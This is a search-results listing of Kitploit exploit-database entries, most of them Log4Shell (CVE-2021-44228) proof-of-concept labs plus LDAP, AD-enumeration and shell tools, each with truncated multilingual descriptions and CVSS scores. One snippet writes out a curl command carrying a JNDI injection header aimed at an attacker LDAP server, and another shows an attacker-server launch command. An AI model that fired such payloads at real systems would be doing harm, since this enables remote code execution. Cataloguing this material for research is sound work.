Lucene search
+L

11775 matches found

Kitploit
Kitploit
added 2026/09/18 3:49 a.m.6 views

goddi

归档说明 此项目不再积极维护。 goddi - 使用Go语言转储域信息 基于 Scott Sutherland @nullbind、Antti Rantasaari、Eric Gruber @egru、Will Schroeder @harmj0y 以及 PowerView 作者的工作。 安装 使用发布版中的可执行文件。如果你想自行构建,请确保你的 Go 环境已按照 Go 设置文档配置好。goddi 包还使用了以下包: root@kitploit: go get gopkg.in/ldap.v2 Windows 已在 Windows 10 和 8.1(go1.10...

6AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/18 3:20 a.m.6 views

cve-2019-14540-exploit

CVE-2019-14540 Exploit http://www.leadroyal.cn/?p=939 Limitación del entorno: debido a que esta demo utiliza el método de explotación ldap de jndi, se necesita usar una versión baja menor a 8u191 del jdk. 1. Usar marshalsec para crear un servicio ldap en el puerto local 1389, apuntando al servici...

9.8CVSS7.4AI score0.10763EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/18 3:16 a.m.7 views

CVE-2026-21011-Log4j-style-JNDI-Injection-in-Custom-Logger-Simulated-

CVE-2026-21011 – Inyección JNDI estilo Log4j en un logger personalizado Simulado Código del programa simulación en Java en Python root@kitploit: log4jsim.py - Custom logger that evaluates $... patterns import subprocess, re def logmessage: Vulnerable: looks up JNDI-like syntax and executes patter...

6.8CVSS6AI score0.00149EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/18 3:09 a.m.6 views

homelab-CVE-2021-44228

Homelab: Log4Shell CVE-2021-44228 en Apache Solr Entorno controlado en Docker para reproducir y estudiar la vulnerabilidad Log4Shell en Apache Solr. El Entorno Objetivo solr-lab: Apache Solr v8.11.0 vulhub/solr:8.11.0 ejecutando una versión vulnerable de Log4j. Atacante kali-lab: Contenedor Kali...

10CVSS7.6AI score0.99999EPSS
SaveExploits373
Kitploit
Kitploit
added 2026/09/18 2:57 a.m.91 views

fingerprintx

Features • Installation • Usage • Running fingerprintx • Using as a library • Why not nmap? • Notes • Acknowledgements fingerprintx is a utility similar to httpx that also supports fingerprinting services like as RDP, SSH, MySQL, PostgreSQL, Kafka, etc. fingerprintx can be used alongside port...

5.9AI score
SaveExploits0References16
Kitploit
Kitploit
added 2026/09/18 12:50 a.m.12 views

LDAP-Monitoring-Watchdog

LDAP Watchdog 概述 LDAP Watchdog 是一款实时监控 LDAP 目录中记录变更的工具。它提供了一种跟踪和可视化用户及组条目修改、添加和删除的机制,使用户能够将预期变更与实际变更关联起来,并识别潜在的安全事件。该工具专为 OpenLDAP 和 Linux 设计,但也可能适用于其他 LDAP 实现。它使用 Python 编写,仅需 ldap3 库。 本软件由 Joshua Rogers 编写。 如果您对以下任意一点感兴趣,那么 LDAP Watchdog 非常适合您: 通过 Slack Webhook 集成,按需了解 LDAP 目录中的动态。 查看 LDAP...

6AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/18 12:26 a.m.7 views

cve-2021-44228

CVE-2021-44228 Este repositorio representa una simulación simplificada del infame problema CVE-2021-44228. Además de las propiedades del sistema y otras búsquedas en estructuras de diccionario, Apache Log4j también implementa la función de búsqueda JNDI por varias razones. El JNDI puede obtener...

10CVSS8.3AI score0.99999EPSS
SaveExploits373References1
Kitploit
Kitploit
added 2026/09/18 12:13 a.m.9 views

TPASLog4ShellPoC

TPAS Log4Shell PoC 此仓库包含 Log4Shell 漏洞(CVE-2021-44228)的概念验证(PoC),作为 FCUP 信息安全硕士课程中 TPAS 单元课程作业的一部分开发而成。 它包含: 一个 React SPA 前端,模拟通用电子商务网站,具备浏览产品以及查看描述、价格、评分等基本信息的功能,数据通过虚拟 JSON API https://dummyjson.com/docs/products 提供 一个 Spring Boot REST API 后端,使用存在漏洞的 Log4j 2.14 版本 一个 Bash 脚本,用于设置利用 Log4Shell...

10CVSS7.7AI score0.99999EPSS
SaveExploits373
Kitploit
Kitploit
added 2026/09/18 12:02 a.m.9 views

LOG4J-CVE-2021-44228

LOG4J-CVE-2021-44228 Log4Shell — también conocido como CVE-2021-44228 — es una vulnerabilidad crítica que permite la ejecución remota de código en sistemas que utilizan Log4j de la Apache Foundation, que es una biblioteca Java de código abierto ampliamente utilizada en productos de software...

10CVSS8AI score0.99999EPSS
SaveExploits373
Kitploit
Kitploit
added 2026/09/17 11:43 p.m.8 views

log4j-shell-poc

log4j-shell-poc Una prueba de concepto para la vulnerabilidad CVE-2021-44228 encontrada recientemente. Recientemente apareció una nueva vulnerabilidad en log4j, una librería de registro de Java muy utilizada en proyectos como elasticsearch, minecraft y muchos otros. En este repositorio hay una...

10CVSS7.8AI score0.99999EPSS
SaveExploits373
Kitploit
Kitploit
added 2026/09/17 11:40 p.m.8 views

sample-ldap-exploit

sample-ldap-exploit Una breve demo de CVE-2021-44228 Compilar root@kitploit: $ mvn clean verify Ejecutar Atacante root@kitploit: $ java \ -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/' \ sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080...

10CVSS7.8AI score0.99999EPSS
SaveExploits373
Kitploit
Kitploit
added 2026/09/17 9:40 p.m.10 views

log4j2-test

Comprobación de la vulnerabilidad de ejecución remota de código LDAP en Log4j2 2.14.1 CVE-2021-44228 🎈 Probado en entorno Spring Boot 2.x Aviso de vulnerabilidad https://nvd.nist.gov/vuln/detail/CVE-2021-44228 target-server pom.xml: reduce la versión de Log4j2 a una versión vulnerable...

10CVSS7.7AI score0.99999EPSS
SaveExploits373References1
Kitploit
Kitploit
added 2026/09/17 8:59 p.m.9 views

OneLogicalMyth_Shell

OneLogicalMythShell Este shell HTA fue creado para ayudar en evaluaciones de breakout. Lo construí hace más de un año inicialmente y pensé que a otros les podría resultar útil, así que ahora lo he hecho público. No dudes en enviar pull requests. Características Explorador de archivos Listar...

5.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 6:24 p.m.12 views

ldap-swak

LDAP Swiss Army Knife Multi-function LDAP server utility. Quickly setup LDAP server for testing purposes, MitM proxies for intercepting plaintext or forwarding NTLM credentials or exploit various Java JNDI/LDAP Client vulnerabilities. Author: Moritz Bechler [email protected] Project...

8.3CVSS7.2AI score0.07156EPSS
SaveExploits2References2
Kitploit
Kitploit
added 2026/09/17 5:40 p.m.9 views

log4shell_lab

Laboratorio de explotación log4shell Este repositorio es una configuración de una sola línea para el laboratorio de explotación log4shell. Configura el laboratorio: docker-compose up -d Ejecuta el exploit: curl -X GET http://localhost:8080/ -H "X-Api-Version: $jndi:ldap://myldapserver:1389/a" Lue...

5.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/17 5:37 p.m.12 views

EXPLOIT-CVE-2021-44228

CVE-2021-44228 — Laboratorio PoC de Log4Shell AVISO Este laboratorio fue creado exclusivamente con fines educativos y de investigación en seguridad. Todo el tráfico ocurre dentro de una red Docker aislada. No utilices este material en sistemas reales ni sin autorización explícita. El uso indebido...

10CVSS7.7AI score0.99999EPSS
SaveExploits373
Kitploit
Kitploit
added 2026/09/17 5:35 p.m.9 views

log4j-vul

log4j-vul Este proyecto solo tiene como objetivo mostrar la vulnerabilidad de Apache Log4j2 - también conocida como CVE-2021-44228 Java: java version "1.8.0121" Compilar: from src folder javac -classpath .;..\lib\log4j-api-2.1.jar;..\lib\log4j-core-2.1.jar com\example\Log4jVul.java Ejecutar\Corre...

10CVSS7.9AI score0.99999EPSS
SaveExploits373
Kitploit
Kitploit
added 2026/09/17 4:02 p.m.9 views

Log4Shell

Log4Shell CVE-2021-44228 ☠️ Log4Shell PoC CVE-2021-44228 Exploit de prueba para la vulnerabilidad crítica Log4Shell en Apache Log4j ≤ 2.14.1, que permite ejecución remota de código mediante inyecciones JNDI. ⚠️ Este PoC es solo para fines educativos y pruebas controladas en entornos autorizados. No...

10CVSS7.8AI score0.99999EPSS
SaveExploits373References1
Kitploit
Kitploit
added 2026/09/17 3:37 p.m.10 views

CVE-2026-76578

CVE-2026-76578 — Toma de control anónima de administrador en FreeIPA Producto: FreeIPA 4.9.x – 4.13.3 Gravedad: Crítica CVSS 9.8 Corregido: FreeIPA 4.13.4 / 389-ds-base 3.2.0-10.el102 RHSA-2026:64785 Aviso legal Esta prueba de concepto fue desarrollada y ejecutada exclusivamente dentro de un...

9.8CVSS6.2AI score0.00453EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/09/17 3:17 p.m.291 views

jackdaw

jackdaw gather gather gather What is this? Jackdaw is here to collect all information in your domain, store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy...

6AI score
SaveExploits0References4
Rows per page
Query Builder